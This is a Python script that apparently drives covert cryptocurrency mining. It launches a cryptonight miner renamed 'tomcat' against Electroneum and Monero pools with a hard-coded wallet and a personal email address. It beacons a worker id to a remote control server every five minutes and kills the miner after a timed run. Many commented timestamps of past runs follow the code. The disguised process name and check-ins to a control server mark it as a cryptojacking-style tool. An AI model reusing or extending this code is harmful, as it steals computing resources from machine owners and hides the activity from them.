import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:01.445434
#2018-02-17 16:56:01.544438
#2018-02-17 18:43:07.994886
#2018-02-17 20:32:03.944477
#2018-02-17 22:18:01.820202
#2018-02-18 00:01:07.380492
#2018-02-18 01:53:04.078118
#2018-02-18 03:41:07.908389
#2018-02-18 05:30:07.927866
#2018-02-18 07:22:03.756683
#2018-02-18 09:10:07.771603
#2018-02-18 10:56:06.412206
#2018-02-18 12:44:06.352123
#2018-02-18 14:32:06.140701
#2018-02-18 16:22:01.690856
#2018-02-18 18:11:07.563450
#2018-02-18 19:57:06.302000
#2018-02-18 21:43:04.327841
#2018-02-18 23:32:07.214372
#2018-02-19 01:18:06.879059
#2018-02-19 03:06:07.749242
#2018-02-19 04:51:05.457777
#2018-02-19 06:37:05.700885
#2018-02-19 08:26:07.608975
#2018-02-19 10:15:06.564519
#2018-02-19 12:04:04.867764
#2018-02-19 13:52:01.915566
#2018-02-19 15:40:09.806716
#2018-02-19 17:28:01.263699
#2018-02-19 19:16:06.688072
#2018-02-19 21:05:07.100068
#2018-02-19 22:51:03.939642
#2018-02-20 00:36:05.576295
#2018-02-20 02:25:05.354997
#2018-02-20 04:15:07.899023
#2018-02-20 05:58:06.985939
#2018-02-20 07:44:06.577151
#2018-02-20 09:29:04.363684
#2018-02-20 11:12:08.179831
#2018-02-20 13:01:09.687219
#2018-02-20 14:45:10.258408
#2018-02-20 16:35:12.665090
#2018-02-20 18:22:06.771461
#2018-02-20 20:12:02.155112
#2018-02-20 21:59:04.252854
#2018-02-20 23:41:07.675064
#2018-02-21 01:27:05.668481
#2018-02-21 03:16:03.728962
#2018-02-21 05:05:07.756794
#2018-02-21 06:53:05.476197
#2018-02-21 08:40:04.875377
#2018-02-21 10:26:01.403623
#2018-02-21 12:16:09.437380
#2018-02-21 14:04:01.855106
#2018-02-21 15:49:02.094272
#2018-02-21 17:42:03.930367
#2018-02-21 19:29:08.937951
#2018-02-21 21:17:07.234988
#2018-02-21 23:05:09.320863
#2018-02-22 00:55:03.518915
#2018-02-22 02:44:07.856594
#2018-02-22 04:31:04.161151
#2018-02-22 06:16:04.194614
#2018-02-22 08:03:06.051397
#2018-02-22 09:51:01.942058
#2018-02-22 11:35:12.686460
#2018-02-22 13:24:04.603688
#2018-02-22 15:12:07.150565
#2018-02-22 16:56:07.935643
#2018-02-22 18:44:07.740434
#2018-02-22 20:35:11.243441
#2018-02-22 22:20:09.847964
#2018-02-23 00:07:08.131253
#2018-02-23 01:57:06.249978
#2018-02-23 03:43:04.995536
#2018-02-23 05:29:01.908022
#2018-02-23 07:14:04.785777
#2018-02-23 09:19:06.412451
#2018-02-23 11:24:06.388579
#2018-02-23 13:15:07.500813
#2018-02-23 15:02:08.947272
#2018-02-23 16:51:06.125482
#2018-02-23 18:40:06.037463
#2018-02-23 20:26:05.655023
#2018-02-23 22:14:01.629976
#2018-02-24 00:00:01.674412
#2018-02-24 01:49:05.238771
#2018-02-24 03:42:06.758318
#2018-02-24 05:27:07.584980
#2018-02-24 07:14:06.059324
#2018-02-24 09:04:05.460391
#2018-02-24 10:59:06.930922
#2018-02-24 12:47:04.844890
#2018-02-24 14:36:05.742676
#2018-02-24 16:23:01.932861
#2018-02-24 18:16:03.719085
#2018-02-24 20:02:01.961997
#2018-02-24 21:44:06.165270
#2018-02-25 00:41:06.678475
#2018-02-25 03:33:07.706461
#2018-02-25 07:21:06.593435